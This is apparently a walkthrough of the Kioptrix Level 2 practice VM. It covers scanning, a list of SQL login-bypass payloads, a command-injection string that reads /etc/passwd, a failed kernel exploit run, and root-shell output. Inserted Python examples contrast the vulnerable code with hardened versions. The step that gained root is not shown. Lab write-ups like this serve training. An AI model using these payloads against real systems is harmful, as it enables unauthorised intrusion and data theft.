Kioptrix: Level 1 (#2) – Walkthrough

I am busy today with the Myanmar Cyber Security Challenge 2018 (CTF), but I will try to write the walkthrough of this challenge VM. OK, let's try to exploit the box.

The first step is to find the target IP on the network; I use an nmap ping scan.

┌─[[email protected]]─[~]
└──> nmap 192.168.1.* -sn -n 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-06 13:17 +0630
Nmap scan report for 192.168.1.1
Host is up (0.0010s latency).
MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies)
Nmap scan report for 192.168.1.72
Host is up (0.00023s latency).
MAC Address: 00:0C:29:F7:CC:C7 (VMware)
Nmap scan report for 192.168.1.78
Host is up (0.00018s latency).
MAC Address: 08:00:27:CA:D9:CE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.100
Host is up (0.00019s latency).
MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer)
Nmap scan report for 192.168.1.101
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds

The target IP is 192.168.1.72, so I scan it for services.

┌─[[email protected]]─[~]
└──> nmap -sV 192.168.1.72

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-06 13:20 +0630
Nmap scan report for 192.168.1.72
Host is up (0.0020s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
666/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:F7:CC:C7 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds

Yes. I explore port 80 first and scan for directory paths with dirb. I find a Remote Admin login form on the index page. Checking the source code, I notice this HTML comment.

<!-- Start of HTML when logged in as Administator -->

I am fairly sure the username is Administator. I try to log in first, so let me test some SQL login bypass queries.

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--

Yes, the login bypass succeeds, and I find a ping form in the admin panel.

' or '1'='1
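To show why a payload like the one above works and how the form should have been written, here is an added example (not code from the Kioptrix VM or from this post) in Python, with SQLite standing in for the MySQL backend: the vulnerable concatenated query beside a parameterized one. The table contents, the demo password and the function names are constructed for this example.

```python
import hmac
import sqlite3

# Constructed demo data: one admin row in an in-memory SQLite table. The
# username is the one hinted at by the page's HTML comment; the password is
# a placeholder invented for this example.
DEMO_USER = "Administator"
DEMO_PASSWORD = "constructed-demo-password"


def make_db() -> sqlite3.Connection:
    """Build the demo users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", (DEMO_USER, DEMO_PASSWORD))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The pattern behind the Remote Admin form: input is pasted into the SQL
    text, so a quote in the input ends the string and the rest is parsed as SQL.
    With password "' or '1'='1" the WHERE clause becomes
    username='...' AND password='' or '1'='1', which is true for every row."""
    query = (f"SELECT username FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: placeholders keep the input as data, so the same payload
    is compared literally against the stored value and never matches."""
    row = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    # Constant-time compare. A real application stores a salted slow hash
    # (bcrypt, PBKDF2) rather than the plaintext kept here for brevity.
    return hmac.compare_digest(row[0].encode(), password.encode())


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print("vulnerable:", login_vulnerable(db, DEMO_USER, payload))  # True
    print("safe:      ", login_safe(db, DEMO_USER, payload))        # False
```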

I try to exploit it with command injection by entering www.google.com;cat /etc/passwd in the ping form.
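As an added example (not the VM's own PHP and not the author's code), the ping form's flaw and its fix in Python: the vulnerable version concatenates the field into a shell command line, so a ';' starts a second command (echo stands in for ping so it runs offline), while the hardened version validates the hostname against an allow-list and passes it as a single argv element with no shell. The regex and function names are my own.

```python
import re
import subprocess

# Hostname/IP syntax (RFC 1123 labels). A hostname contains no ';', '|', '&',
# space or quote, so this allow-list rejects every shell metacharacter, and the
# leading alphanumeric also stops option injection such as "-f". Regex is my own.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def run_vulnerable(host: str) -> str:
    """How the admin ping form behaves: the field is concatenated into a shell
    command line, so ';' ends the first command and starts a second one. 'echo'
    stands in for ping so this runs offline; the shell parsing is identical."""
    proc = subprocess.run("echo pinging " + host, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def is_valid_host(host: str) -> bool:
    return HOST_RE.fullmatch(host) is not None


def safe_ping_argv(host: str) -> list:
    """Hardened form: validate against the allow-list, then build an argv list.
    Raises ValueError for anything that is not a plain hostname or IP."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host argument: {host!r}")
    return ["ping", "-c", "1", host]  # Linux ping syntax


def run_safe(host: str) -> str:
    # shell=False: the list goes straight to execve, no shell ever sees it.
    proc = subprocess.run(safe_ping_argv(host), shell=False,
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    payload = "www.google.com;echo INJECTED"
    print(run_vulnerable(payload))        # second output line reads INJECTED
    try:
        run_safe(payload)
    except ValueError as exc:
        print(exc)                        # rejected before any process runs
```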


─[✗]─[[email protected]]─[~]
└──> dirb http://192.168.1.72 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jan  6 13:22:10 2018
URL_BASE: http://192.168.1.72/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.72/ ----
+ http://192.168.1.72/cgi-bin/ (CODE:403|SIZE:288)                                                                
+ http://192.168.1.72/index.php (CODE:200|SIZE:667)                                                               
==> DIRECTORY: http://192.168.1.72/manual/                                                                        
+ http://192.168.1.72/usage (CODE:403|SIZE:285)                                                                   
                                                                                                                  
-----------------
END_TIME: Sat Jan  6 13:22:19 2018
DOWNLOADED: 4612 - FOUND: 3

HTTPS gives the same results. OK, so I try to get a reverse connection back with netcat.

I search Google to check whether the kernel version is vulnerable.

Then I download the exploit and try to root it!

https://www.exploit-db.com/exploits/1397/

But it does not work:

bash-3.00$ gcc Laiwon.c -o loveme
Laiwon.c:730:28: warning: no newline at end of file
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ ./loveme
[  k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit  ]
[ Discovered Jan 2005 by sd <[email protected]> ]
[ Modified 2005/9 by alert7 <[email protected]> ]
[+] try open /proc/cpuinfo .. ok!!
[+] find cpu flag pse in /proc/cpuinfo
[+] CONFIG_X86_PAE :none
[+] Cpu flag: pse ok
[+] Exploit Way : 0
[+] Use 1 pages (one page is 4K ),rewrite 0xc0000000--(0xc0001000 + n)
[+] thread_size 0 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 
epoll_wait: Invalid argument
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
[+] idtr.base 0xc03fd000 ,base 0xc0000000
[+] kwrite base 0xc0000000, buf 0xbfedbe30,num 4100
[-] This kernel not vulnerability!!!
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ 

Next exploit! 😉

sh-3.00# cd mail
cd mail
sh-3.00# ls -al
ls -al
total 24
drwxrwxr-x   2 root   mail 4096 Jan  5 18:55 .
drwxr-xr-x  14 root   root 4096 Oct  7  2009 ..
-rw-rw----   1 harold mail    0 Oct 12  2009 harold
-rw-rw----   1 john   mail    0 Oct  8  2009 john
-rw-------   1 root   root 4351 Jan  5 18:55 root
sh-3.00# cat root
cat root
From [email protected]  Fri Jan  5 18:55:42 2018
Return-Path: <[email protected]>
Received: from localhost (localhost)
	by kioptrix.level2 (8.13.1/8.13.1) id w05Ntf9C002820;
	Fri, 5 Jan 2018 18:55:41 -0500
Date: Fri, 5 Jan 2018 18:55:41 -0500
From: Mail Delivery Subsystem <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
	boundary="w05Ntf9C002820.1515196541/kioptrix.level2"
Subject: Postmaster notify: see transcript for details
Auto-Submitted: auto-generated (postmaster-notification)

This is a MIME-encapsulated message

--w05Ntf9C002820.1515196541/kioptrix.level2

The original message was received at Thu, 9 Feb 2012 22:39:59 -0500
from localhost
with id q1A3dxnO003116

   ----- The following addresses had permanent fatal errors -----
<[email protected]>

   ----- Transcript of session follows -----
451 kioptrix.level2: Name server timeout
Message could not be delivered for 5 days
Message will be deleted from queue

--w05Ntf9C002820.1515196541/kioptrix.level2
Content-Type: message/delivery-status

Reporting-MTA: dns; kioptrix.level2
Arrival-Date: Thu, 9 Feb 2012 22:39:59 -0500

Final-Recipient: RFC822; [email protected]
Action: failed
Status: 4.4.7
Last-Attempt-Date: Fri, 5 Jan 2018 18:55:41 -0500

--w05Ntf9C002820.1515196541/kioptrix.level2
Content-Type: message/rfc822

Return-Path: <MAILER-DAEMON>
Received: from localhost (localhost)
	by kioptrix.level2 (8.13.1/8.13.1) id q1A3dxnO003116;
	Thu, 9 Feb 2012 22:39:59 -0500
Date: Thu, 9 Feb 2012 22:39:59 -0500
From: Mail Delivery Subsystem <MAILER-DAEMON>
Message-Id: <[email protected]>
To: <[email protected]>
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
	boundary="q1A3dxnO003116.1328845199/kioptrix.level2"
Subject: Returned mail: see transcript for details
Auto-Submitted: auto-generated (failure)

This is a MIME-encapsulated message

--q1A3dxnO003116.1328845199/kioptrix.level2

The original message was received at Mon, 12 Oct 2009 04:02:04 -0500
from localhost.localdomain [127.0.0.1]

   ----- The following addresses had permanent fatal errors -----
<[email protected]>

   ----- Transcript of session follows -----
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
451 kioptrix.level2: Name server timeout
Message could not be delivered for 5 days
Message will be deleted from queue
451 kioptrix.level2: Name server timeout

--q1A3dxnO003116.1328845199/kioptrix.level2
Content-Type: message/delivery-status

Reporting-MTA: dns; kioptrix.level2
Arrival-Date: Mon, 12 Oct 2009 04:02:04 -0500

Final-Recipient: RFC822; [email protected]
Action: failed
Status: 4.4.7
Last-Attempt-Date: Thu, 9 Feb 2012 22:39:59 -0500

--q1A3dxnO003116.1328845199/kioptrix.level2
Content-Type: message/rfc822

Return-Path: <[email protected]>
Received: from kioptrix.level2 (localhost.localdomain [127.0.0.1])
	by kioptrix.level2 (8.13.1/8.13.1) with ESMTP id n9C824DR003890
	for <[email protected]>; Mon, 12 Oct 2009 04:02:04 -0400
Received: (from [email protected]ost)
	by kioptrix.level2 (8.13.1/8.13.1/Submit) id n9C824Nj003888
	for root; Mon, 12 Oct 2009 04:02:04 -0400
Date: Mon, 12 Oct 2009 04:02:04 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Subject: LogWatch for kioptrix.level2


 ################### LogWatch 5.2.2 (06/23/04) #################### 
       Processing Initiated: Mon Oct 12 04:02:04 2009
       Date Range Processed: yesterday
     Detail Level of Output: 0
          Logfiles for Host: kioptrix.level2
 ################################################################ 

 --------------------- SSHD Begin ------------------------ 

SSHD Killed: 1 Time(s)

 ---------------------- SSHD End ------------------------- 



------------------ Disk Space --------------------

/dev/mapper/VolGroup00-LogVol00
                      3.3G  1.5G  1.7G  47% /
/dev/hda1              99M  9.3M   85M  10% /boot


 ###################### LogWatch End ######################### 


--q1A3dxnO003116.1328845199/kioptrix.level2--


--w05Ntf9C002820.1515196541/kioptrix.level2--

WooT… and I get the email message.

Thanks for reading. Happy hacking. 😉